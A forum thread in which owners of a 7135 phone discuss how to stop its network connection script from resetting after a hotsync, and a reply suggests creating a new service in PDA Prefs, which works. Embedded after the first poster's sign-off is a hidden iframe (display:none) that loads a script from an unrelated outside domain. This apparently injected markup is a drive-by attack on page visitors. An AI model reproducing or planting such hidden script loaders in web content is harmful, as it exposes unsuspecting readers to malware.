+ Reply to Thread

keeping network settings after hotsync

Hi,
    Just got my phone this week and I'd have to say that overall I love it! There are some issues, but we'll leave that for another thread.
    So I guess I have two questions:
    1.) How do I keep my script (under network settings) from defaulting when I hotsync? I have it set such that the handheld should overwrite the desktop.

2.) When using a qnc connection, do I always need to select data call through the fax/modem program, or is there a way around this?

Thanx!

Dave<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

NETWORK HOTSYNC

GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Re: keeping network settings after hotsync

I have the same questions and did not see them answered in the thread that Gregg pointed to.

In essence, what happens is that during a hotsync, the 7135 defaults back to Express networking. After each hotsync, I have to go into pdaprefs, networking and change the script to qnc (=2)

Has anyone else but us 2 seen this?

Originally posted by lavind2
    Hi,
    Just got my phone this week and I'd have to say that overall I love it! There are some issues, but we'll leave that for another thread.
    So I guess I have two questions:
    1.) How do I keep my script (under network settings) from defaulting when I hotsync? I have it set such that the handheld should overwrite the desktop.

2.) When using a qnc connection, do I always need to select data call through the fax/modem program, or is there a way around this?

Thanx!

Dave

Re: Re: keeping network settings after hotsync

Originally posted by Sethster
    I have the same questions and did not see them answered in the thread that Gregg pointed to.

In essence, what happens is that during a hotsync, the 7135 defaults back to Express networking. After each hotsync, I have to go into pdaprefs, networking and change the script to qnc (=2)

Has anyone else but us 2 seen this?
    Some people have had this problem, and I believe they solved it by creating a whole new "service". Go to PDA Prefs, then to the menu and select "New", then create a new connection with all the settings you need. Then use that one instead of the default one that came with the phone. See if that works.

Re: Re: Re: keeping network settings after hotsync

Originally posted by davemayo
    Some people have had this problem, and I believe they solved it by creating a whole new "service". Go to PDA Prefs, then to the menu and select "New", then create a new connection with all the settings you need. Then use that one instead of the default one that came with the phone. See if that works.

Worked like a champ for me. Did it at the suggestion of a Vz customer rep. He actually had a 7135 in his hand when we were talking.

Bob

Ya, I'm sure that'll work. I guess I wasn't really thinkin it through. Thanx guys!